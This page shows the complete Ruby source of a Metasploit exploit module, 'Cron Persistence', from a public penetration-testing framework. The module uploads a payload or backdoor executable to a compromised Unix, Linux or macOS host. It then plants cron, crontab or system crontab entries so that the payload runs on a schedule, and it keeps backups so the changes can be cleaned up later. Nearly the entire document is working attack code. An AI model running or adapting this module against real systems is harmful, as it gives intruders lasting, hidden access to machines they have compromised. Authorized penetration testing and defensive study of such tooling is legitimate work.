Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/persistence/cron.rb
23592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Unix

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::FileDropper

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/linux/local/cron_persistence'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'Cron Persistence',

23
        'Description' => %q{

24
          This module will create a cron or crontab entry to execute a payload.

25
          The module includes the ability to automatically clean up those entries to prevent multiple executions.

26
          syslog will get a copy of the cron entry.

27
          Verified on Ubuntu 22.04.1, MacOS 13.7.4

28
        },

29
        'License' => MSF_LICENSE,

30
        'Author' => [

31
          'h00die <[email protected]>'

32
        ],

33
        'Platform' => ['unix', 'linux', 'osx'],

34
        'Targets' => [

35
          [ 'Cron', { path: '/etc/cron.d' } ],

36
          [ 'User Crontab', { path: '/var/spool/cron/crontabs' } ],

37
          [ 'OSX User Crontab', { path: '/var/at/tabs/' } ],

38
          [ 'System Crontab', { path: '/etc/crontab' } ]

39
        ],

40
        'DefaultTarget' => 1,

41
        'Arch' => [

42
          ARCH_CMD,

43
          ARCH_X86,

44
          ARCH_X64,

45
          ARCH_ARMLE,

46
          ARCH_AARCH64,

47
          ARCH_PPC,

48
          ARCH_MIPSLE,

49
          ARCH_MIPSBE

50
        ],

51
        'SessionTypes' => [ 'shell', 'meterpreter' ],

52
        'DisclosureDate' => '1979-07-01', # Version 7 Unix release date (first cron implementation)

53
        'References' => [

54
          ['ATT&CK', Mitre::Attack::Technique::T1053_003_CRON]

55
        ],

56
        'Notes' => {

57
          'Stability' => [CRASH_SAFE],

58
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

59
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptString.new('USER', [false, 'User to run cron/crontab as', ''], conditions: ['Targets', 'in', ['User Crontab', 'OSX User Crontab']]),

67
        OptString.new('TIMING', [false, 'Cron timing. Changing will require WfsDelay to be adjusted', '* * * * *']),

68
        OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

69
      ]

70
    )

71
  end

72


73
  def check

74
    # https://gist.github.com/istvanp/310203 for cron regex validator

75
    cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'

76
    cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'

77
    cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'

78
    cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'

79
    cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*

80
    # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'

81


82
    return CheckCode::Unknown('Invalid timing format') unless datastore['TIMING'] =~ /#{cron_regex}/

83


84
    return CheckCode::Safe("#{target.opts[:path]} doesn't exist") unless exists?(target.opts[:path])

85
    # it may not be directly writable, but we can use crontab to write it for us

86
    if !writable?(target.opts[:path]) && !command_exists?('crontab')

87
      return CheckCode::Safe("Can't write to: #{target.opts[:path]} or crontab not found")

88
    end

89


90
    if target.name == 'User Crontab' && !user_cron_permission?(target_user)

91
      return CheckCode::Unknown('User denied cron via cron.deny')

92
    end

93


94
    CheckCode::Appears('Cron timing is valid, no cron.deny entries found')

95
  end

96


97
  def target_user

98
    return datastore['USER'] unless datastore['USER'].blank?

99


100
    whoami

101
  end

102


103
  def user_cron_permission?(user)

104
    # double check we're allowed to do cron

105
    # may also be /etc/cron.d/

106
    paths = ['/etc/', '/etc/cron.d/']

107
    paths.each do |path|

108
      if readable?("#{path}cron.allow")

109
        cron_auth = read_file("#{path}cron.allow")

110
        if cron_auth && (cron_auth =~ /^ALL$/ || cron_auth =~ /^#{Regexp.escape(user)}$/)

111
          vprint_good("User located in #{path}cron.allow")

112
          return true

113
        end

114
      end

115
      next unless readable?("#{path}cron.deny")

116


117
      cron_auths = read_file("#{path}cron.deny")

118
      if cron_auths && cron_auth =~ /^#{Regexp.escape(user)}$/

119
        vprint_error("User located in #{path}cron.deny")

120
        return false

121
      end

122
    end

123
    # no guidance, so we should be fine

124
    true

125
  end

126


127
  def install_persistence

128
    cron_entry = datastore['TIMING']

129
    cron_entry += " #{target_user}" unless ['User Crontab', 'OSX User Crontab'].include?(target.name)

130
    if payload.arch.first == 'cmd'

131
      payload_info['BadChars'] = "#%\x10\x13"

132
      cron_entry += " #{regenerate_payload.encoded}"

133
      payload_info.delete('BadChars')

134
    else

135
      file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

136
      backdoor = "#{writable_dir}/#{file_name}"

137
      vprint_status("Writing backdoor to #{backdoor}")

138
      upload_and_chmodx backdoor, generate_payload_exe

139
      cron_entry += " #{backdoor}"

140
    end

141


142
    case target.name

143
    when 'Cron'

144
      our_entry = Rex::Text.rand_text_alpha(8..15)

145
      write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")

146
      vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")

147
      @clean_up_rc << "rm #{target.opts[:path]}/#{our_entry}\n"

148


149
    when 'System Crontab'

150
      file_to_clean = target.opts[:path].to_s

151
      crontab_backup = store_crontab_backup(file_to_clean, 'system crontab backup')

152


153
      append_file(file_to_clean, "\n#{cron_entry}\n")

154
      vprint_good("Writing #{cron_entry} to #{file_to_clean}")

155
      @clean_up_rc << "upload #{crontab_backup} #{file_to_clean}\n"

156


157
    when 'User Crontab', 'OSX User Crontab'

158
      path = target.opts[:path]

159
      if !writable?(path)

160
        print_status("Utilizing crontab since we can't write to #{path}")

161
        cmd_exec("echo \"#{cron_entry}\" | crontab -")

162
      else

163
        file_to_clean = "#{path}/#{target_user}"

164


165
        crontab_backup = store_crontab_backup(file_to_clean, 'user crontab backup')

166
        append_file(file_to_clean, "\n#{cron_entry}\n")

167
        vprint_good("Writing #{cron_entry} to #{file_to_clean}")

168
        # at least on ubuntu, we need to reload cron to get this to work

169
        vprint_status('Reloading cron to pickup new entry')

170


171
        cmd_exec('service cron reload') if target.name == 'User Crontab'

172
        @clean_up_rc << "upload #{crontab_backup} #{file_to_clean}\n"

173
      end

174
    end

175
    print_good('Payload will be triggered when cron time is reached')

176
  end

177


178
  def store_crontab_backup(path, desc)

179
    crontab_backup_content = read_file(path)

180
    location = store_loot("crontab.#{path.split('/').last}",

181
                          'text/plain', session, crontab_backup_content,

182
                          path.split('/').last, desc)

183
    vprint_good("Backed up #{path} to #{location}")

184
    location

185
  end

186
end

187


188